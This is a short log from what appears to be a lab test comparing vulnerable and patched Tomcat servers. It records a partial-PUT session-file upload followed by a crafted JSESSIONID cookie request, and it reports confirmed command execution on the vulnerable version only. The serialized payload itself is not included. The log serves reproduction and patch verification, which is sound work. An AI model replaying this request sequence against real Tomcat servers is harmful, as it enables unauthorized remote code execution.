Tomcat started. Tomcat started. vulnerable-10.1.34 healthcheck: HTTP 200 fixed-10.1.35 healthcheck: HTTP 200 === vulnerable-10.1.34 exploit attempt === vulnerable-10.1.34 PUT /payload.session Content-Range status: 201 vulnerable-10.1.34 GET /index.jsp Cookie:JSESSIONID=.payload status: 500 === fixed-10.1.35 exploit attempt === fixed-10.1.35 PUT /payload.session Content-Range status: 201 fixed-10.1.35 GET /index.jsp Cookie:JSESSIONID=.payload status: 200 vulnerable work session created: true fixed work session created: false vulnerable marker: uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) fixed marker: vulnerable webapp payload file exists: true fixed webapp payload file exists: true CONFIRMED: vulnerable Tomcat executed attacker-controlled command: uid=1000(vscode) gid=1000(vscode) groups=1000(vscode)